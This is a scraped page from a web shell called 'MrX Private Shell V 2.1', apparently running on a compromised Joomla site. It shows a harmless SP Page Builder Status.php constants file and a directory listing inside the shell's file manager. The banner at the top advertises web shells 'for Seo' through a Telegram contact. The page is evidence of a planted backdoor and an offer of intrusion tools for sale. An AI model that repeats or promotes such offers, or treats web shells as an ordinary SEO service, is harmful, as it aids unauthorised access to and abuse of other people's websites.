__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2024 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
namespace JoomShaper\SPPageBuilder\DynamicContent\Constants;
defined('_JEXEC') or die;
class Status
{
/**
* The published status
*
* @var int
*
* @since 5.5.0
*/
public const PUBLISHED = 1;
/**
* The unpublished status
*
* @var int
*
* @since 5.5.0
*/
public const UNPUBLISHED = 0;
/**
* The all status
*
* @var string
*
* @since 5.5.0
*/
public const ALL = '*';
/**
* The trashed status
*
* @var int
*
* @since 5.5.0
*/
public const TRASHED = -2;
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Conditions.php | File | 4.88 KB | 0664 |
|
| DateRange.php | File | 1011 B | 0664 |
|
| FieldTypes.php | File | 2.3 KB | 0664 |
|
| Operators.php | File | 1.22 KB | 0664 |
|
| Status.php | File | 829 B | 0664 |
|
| Validator.php | File | 1.39 KB | 0664 |
|